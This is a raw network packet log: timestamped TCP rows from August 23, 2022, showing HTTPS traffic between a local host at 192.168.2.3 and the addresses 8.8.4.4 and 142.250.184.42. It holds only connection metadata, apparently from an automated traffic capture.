Aug 23, 2022 03:43:36.104149103 CEST	62431	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:43:36.111840963 CEST	443	64271	142.251.209.4	192.168.2.3
Aug 23, 2022 03:43:36.114492893 CEST	64271	443	192.168.2.3	142.251.209.4
Aug 23, 2022 03:43:36.125056982 CEST	443	64271	142.251.209.4	192.168.2.3
Aug 23, 2022 03:43:36.125133038 CEST	443	64271	142.251.209.4	192.168.2.3
Aug 23, 2022 03:43:36.125833988 CEST	64271	443	192.168.2.3	142.251.209.4
Aug 23, 2022 03:43:36.137070894 CEST	443	64271	142.251.209.4	192.168.2.3
Aug 23, 2022 03:43:36.137115002 CEST	443	64271	142.251.209.4	192.168.2.3
Aug 23, 2022 03:43:36.153495073 CEST	64271	443	192.168.2.3	142.251.209.4
Aug 23, 2022 03:43:36.153886080 CEST	64271	443	192.168.2.3	142.251.209.4
Aug 23, 2022 03:43:36.169775009 CEST	64271	443	192.168.2.3	142.251.209.4
Aug 23, 2022 03:43:36.170084953 CEST	64271	443	192.168.2.3	142.251.209.4
Aug 23, 2022 03:43:36.170469046 CEST	64271	443	192.168.2.3	142.251.209.4
Aug 23, 2022 03:43:36.174618959 CEST	443	64271	142.251.209.4	192.168.2.3
Aug 23, 2022 03:43:36.191301107 CEST	443	64271	142.251.209.4	192.168.2.3
Aug 23, 2022 03:43:36.191334009 CEST	443	64271	142.251.209.4	192.168.2.3
Aug 23, 2022 03:43:36.191663027 CEST	64271	443	192.168.2.3	142.251.209.4
Aug 23, 2022 03:43:36.191761971 CEST	64271	443	192.168.2.3	142.251.209.4
Aug 23, 2022 03:43:36.215476990 CEST	443	64271	142.251.209.4	192.168.2.3
Aug 23, 2022 03:43:39.555821896 CEST	62431	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:43:39.573088884 CEST	443	62431	8.8.4.4	192.168.2.3
Aug 23, 2022 03:43:39.595583916 CEST	443	62431	8.8.4.4	192.168.2.3
Aug 23, 2022 03:43:39.595628977 CEST	443	62431	8.8.4.4	192.168.2.3
Aug 23, 2022 03:43:39.595948935 CEST	62431	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:43:39.623470068 CEST	62431	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:43:39.638245106 CEST	443	62431	8.8.4.4	192.168.2.3
Aug 23, 2022 03:43:41.676718950 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.697401047 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.700153112 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.713005066 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.713067055 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.713398933 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.720247030 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.720280886 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.743765116 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.743916035 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.745033979 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.745172977 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.745573997 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.745644093 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.761574984 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.761878967 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.764019966 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.765249014 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.765275002 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.765549898 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.765594959 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.765727997 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.765841961 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.765861988 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.765903950 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.781893969 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.790755987 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.790792942 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.791163921 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.792205095 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.792237997 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.792260885 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.792526007 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.793349981 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.794105053 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.794143915 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.794171095 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.794377089 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.796411991 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.796447992 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.796473026 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.796498060 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.796879053 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.796921015 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.798475981 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.798495054 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.798511028 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.800151110 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.800183058 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.800208092 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.802354097 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.802386045 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.802407980 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.803287029 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.803338051 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.803395987 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.803450108 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.803505898 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.804008007 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.804058075 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.804095984 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.805510998 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.806000948 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.806042910 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.806066036 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.806083918 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.806477070 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.807951927 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.807993889 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.808032990 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.808070898 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.808267117 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.808339119 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.809923887 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.809968948 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.810008049 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.810168028 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.810235023 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.811150074 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.811192036 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.811378956 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.812422037 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.812464952 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.812608957 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.813469887 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.813519955 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.813720942 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.814277887 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.814321995 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.816303015 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.816345930 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.816646099 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.816806078 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.816843033 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.816884041 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.819461107 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.819513083 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.819554090 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.819595098 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.821124077 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.821170092 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.823206902 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.823254108 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.823291063 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.823331118 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.823849916 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.823889971 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.826251030 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.826297998 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.826507092 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.826546907 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.827001095 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.827040911 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.827106953 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.827158928 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.827219009 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.827294111 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.827399969 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.827461004 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.827523947 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.828419924 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.828464985 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.828708887 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.828752995 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.829452991 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.829520941 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.830912113 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.830959082 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.831012964 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.831068993 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.831208944 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.831307888 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.831630945 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.831676006 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.831809044 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.832691908 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.832762003 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.832811117 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.832851887 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.832892895 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.832911015 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.832933903 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.833050013 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.833112001 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.833781004 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.833823919 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.833867073 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.833908081 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.833950996 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.833986998 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.833992958 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.834120035 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.834181070 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.835493088 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.835599899 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.835639954 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.835680962 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.835721016 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.835758924 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.835799932 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.835838079 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.836101055 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.836160898 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.836344957 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.836930990 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.836981058 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.837023020 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.837064028 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.837104082 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.837160110 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.837196112 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.837229013 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.837635994 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.839128971 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.839179993 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.839216948 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.839253902 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.839286089 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.839319944 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.839417934 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.839454889 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.839487076 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.839520931 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.839934111 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.840948105 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.841000080 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.841033936 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.841067076 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.841101885 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.841136932 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.841170073 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.841203928 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.846400976 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.846927881 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.846970081 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.847003937 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.847039938 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.847075939 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.847110987 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.847146034 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.847179890 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.848994970 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.849019051 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.849039078 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.849060059 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.849081993 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.849102974 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.849123001 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.849143982 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.849232912 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.849272013 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.850883007 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.850905895 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.850923061 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.850928068 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.850948095 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.851027012 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.851047993 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.851069927 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.851089001 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.851566076 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.851588964 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.851913929 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.852870941 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.852895975 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.852916002 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.852936029 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.852956057 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.852978945 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.853037119 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.853056908 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.853796005 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.853817940 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.853840113 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.853861094 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.855067015 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.855088949 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.855110884 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.855130911 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.855149984 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.855170965 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.855190992 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.855209112 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.856055021 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.856077909 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.856098890 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.856121063 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.856142044 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.856162071 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.856190920 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.856211901 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.857500076 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.857530117 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.857558012 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.857584000 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.857609034 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.857634068 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.857659101 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.857685089 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.858669043 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.858695030 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.858721972 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.858747959 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.858772039 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.858797073 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.858822107 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.858849049 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.859371901 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.859675884 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.859729052 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.859757900 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.859786034 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.859816074 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.859841108 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.859867096 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.859893084 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.859919071 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.859945059 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.859960079 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.859972000 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.860255957 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.860836983 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.861015081 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.861043930 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.861047983 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.861074924 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.861102104 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.861128092 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.861154079 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.861180067 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.861203909 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.861228943 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.861254930 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.861531973 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.862804890 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.862833977 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.862864971 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.862890959 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.862917900 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.862942934 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.862962961 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.862988949 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.863018036 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.863042116 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.863076925 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.866247892 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.866278887 CEST	443	64969	142.250.184.42	192.168.2.3
